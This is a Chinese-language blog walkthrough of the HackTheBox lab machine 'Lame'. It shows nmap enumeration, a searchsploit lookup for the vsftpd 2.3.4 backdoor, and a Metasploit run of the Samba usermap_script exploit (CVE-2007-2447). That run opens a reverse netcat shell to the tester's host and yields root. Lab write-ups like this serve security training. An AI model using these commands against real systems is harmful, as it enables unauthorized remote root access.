Linux/Lame

ve9etable

已于 2024-04-08 16:32:31 修改

阅读量279

点赞数 1

分类专栏： HackTheBox 文章标签： linux 网络安全安全

于 2024-04-08 13:55:02 首次发布

本文链接：https://blog.youkuaiyun.com/weixin_45557138/article/details/137506555

版权

HackTheBox 专栏收录该内容

59 篇文章

订阅专栏

Lame

今天随便乱逛发现这台机器貌似是 HackTheBox 平台的第一台机器，而且我还没做过，从简介上来看的话是一台很简单的机器，快快的玩一下

Enumeration

nmap

首先用 nmap 扫描一下常见的端口，发现系统对外开放了 21,22,139,445 端口。然后在针对这 4 个端口扫描详细信息，可以看到 21 端口运行的 ftp 版本为 vsftpd 2.3.4，而且也允许匿名登录，但是使用 anonymous 登录进去后发现目录是空的

┌──(kali㉿kali)-[~/vegetable/HTB/Lame]
└─$ nmap -sC -sV -p 21,22,139,445 10.10.10.3 -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-07 22:51 EDT
Nmap scan report for 10.10.10.3
Host is up (0.91s latency).

PORT    STATE    SERVICE     VERSION
21/tcp  open     ftp         vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.13
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  filtered ssh
139/tcp filtered netbios-ssn
445/tcp open     netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OS: Unix

Host script results:
|_clock-skew: mean: 1h56m42s, deviation: 2h49m44s, median: -3m19s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2024-04-07T22:49:09-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 126.73 seconds

21/ftp vsftpd 2.3.4

这个版本存在后门漏洞，我利用了一下并没有成功，也不想过多纠结，直接 smb

┌──(kali㉿kali)-[~/vegetable/HTB/Lame]
└─$ searchsploit vsftpd 2.3.4      
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution                                                                                | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                                                   | unix/remote/17491.rb
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

445/Samba

可以直接使用 metasploit 框架，利用 CVE-2007-2447 漏洞

┌──(kali㉿kali)-[~/vegetable/HTB/Lame]
└─$ msfconsole
                                                  

                                   .,,.                  .                                                                                                 
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P                                                                              
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p                                                                            
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'                                                                               
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P                                                                               
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b                                                                           
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b                                                                              
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88                                                                                   
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'                                                                                       
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:                                                                              
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'                                                                            
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'                                                                             
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'                                                                              
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'                                                                               
_______________________________________________________________   ,&$$$$$$'_____                                                                           
                                                                 ll&&$$$$'                                                                                 
                                                              .;;lll&&&&'                                                                                  
                                                            ...;;lllll&'                                                                                   
                                                          ......;;;llll;;;....                                                                             
                                                           ` ......;;;;... .  .                                                                            
                                                                                                                                                           

       =[ metasploit v6.2.26-dev                          ]
+ -- --=[ 2264 exploits - 1189 auxiliary - 404 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: You can use help to view all 
available commands
Metasploit Documentation: https://docs.metasploit.com/

msf6 > exploit/multi/samba/usermap_script
[-] Unknown command: exploit/multi/samba/usermap_script
This is a module we can load. Do you want to use exploit/multi/samba/usermap_script? [y/N]   y
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.50.105   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/samba/usermap_script) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set lhost 10.10.14.13
lhost => 10.10.14.13
msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 10.10.14.13:4444 
[*] Command shell session 1 opened (10.10.14.13:4444 -> 10.10.10.3:48732) at 2024-04-07 23:38:42 -0400

shell
[*] Trying to find binary 'python' on the target machine


whoami[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine

[*] Found bash at /bin/bash
root@lame:/# 
root@lame:/# 
root@lame:/# whoami
root

很老的一台机器了，不想再过多纠结，就这样吧！